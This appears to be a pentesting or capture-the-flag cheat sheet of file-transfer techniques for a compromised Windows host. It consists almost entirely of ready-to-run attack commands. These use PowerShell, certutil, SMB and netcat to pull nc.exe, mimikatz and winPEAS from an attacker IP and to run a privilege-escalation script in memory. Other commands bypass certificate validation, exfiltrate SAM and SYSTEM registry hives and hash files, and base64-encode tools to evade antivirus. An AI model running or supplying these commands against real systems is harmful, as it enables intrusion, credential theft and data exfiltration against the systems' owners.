Skip to main content

HTTP (TCP 80)

Python Web Server (Attacker)

python3 -m http.server 80

PowerShell: Invoke-WebRequest

powershell -c "iwr http://10.10.10.10/nc.exe -OutFile C:\Windows\Temp\nc.exe"
powershell -c "iwr http://10.10.10.10/mimikatz.exe -OutFile mimikatz.exe"
powershell -c "iwr http://10.10.10.10/winPEAS.exe -OutFile winPEAS.exe"
Execute in memory:
powershell -ep bypass -c "iex(iwr http://10.10.10.10/powerup.ps1 -UseBasicParsing)"

PowerShell: WebClient (Stealthier)

powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/nc.exe','nc.exe')"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/mimikatz.exe','mimikatz.exe')"

Certutil (CMD LOLBIN)

certutil -urlcache -split -f http://10.10.10.10/nc.exe nc.exe
certutil -urlcache -split -f http://10.10.10.10/mimikatz.exe mimikatz.exe
certutil -urlcache -split -f http://10.10.10.10/winPEAS.exe winPEAS.exe

SMB (TCP 139 / 445)

Attacker

impacket-smbserver share . -smb2support

Victim Download

copy \\10.10.10.10\share\nc.exe nc.exe
copy \\10.10.10.10\share\mimikatz.exe mimikatz.exe
copy \\10.10.10.10\share\winPEAS.exe winPEAS.exe
PowerShell:
New-PSDrive -Name p -PSProvider FileSystem -Root \\10.10.10.10\share
copy p:\nc.exe .
copy p:\mimikatz.exe .

Upload Loot

copy SAM \\10.10.10.10\share\
copy SYSTEM \\10.10.10.10\share\
copy hashes.txt \\10.10.10.10\share\

HTTPS (TCP 443)

Attacker

# python's http.server is plaintext (no TLS until 3.14) — wrap it with ssl for real HTTPS
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 7 -nodes -subj "/CN=lab"
python3 -c 'import http.server,ssl;h=http.server.HTTPServer(("0.0.0.0",443),http.server.SimpleHTTPRequestHandler);c=ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER);c.load_cert_chain("cert.pem","key.pem");h.socket=c.wrap_socket(h.socket,server_side=True);h.serve_forever()'

Victim

# self-signed cert → bypass validation
powershell -c "[Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; iwr https://10.10.10.10/nc.exe -OutFile nc.exe"

Netcat Raw Transfer (TCP 4444)

Upload to victim (push)

Attacker:
nc -lvnp 4444 < mimikatz.exe
Victim:
nc 10.10.10.10 4444 > mimikatz.exe

Download from victim (exfil)

Attacker:
nc -lvnp 4444 > loot.zip
Victim:
nc 10.10.10.10 4444 < C:\Users\Public\loot.zip

Base64 Transfer (AV Evasion / Restricted Shell)

Attacker

base64 mimikatz.exe > mimikatz.b64
Serve:
python3 -m http.server 80

Victim

certutil -urlcache -f http://10.10.10.10/mimikatz.b64 mimikatz.b64
certutil -decode mimikatz.b64 mimikatz.exe